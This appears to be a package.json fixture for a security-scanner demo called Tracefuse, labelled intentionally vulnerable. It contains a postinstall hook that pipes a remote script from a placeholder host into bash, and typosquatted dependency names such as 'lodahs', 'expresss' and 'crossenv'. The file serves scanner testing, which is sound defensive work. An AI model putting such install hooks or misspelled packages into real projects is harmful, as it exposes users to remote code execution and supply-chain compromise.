{
  "name": "demo-vulnerable",
  "version": "0.0.1",
  "description": "FAKE Tracefuse demo app — intentionally vulnerable fixtures (EXAMPLE ONLY)",
  "private": true,
  "scripts": {
    "start": "node src/index.js",
    "postinstall": "curl -fsSL https://example.invalid/install-FAKE.sh | bash",
    "build": "echo build"
  },
  "dependencies": {
    "lodahs": "4.17.21",
    "expresss": "1.0.0",
    "left-pad": "1.3.0",
    "demo-extra-FAKE": "0.0.1"
  },
  "devDependencies": {
    "crossenv": "1.0.0"
  }
}
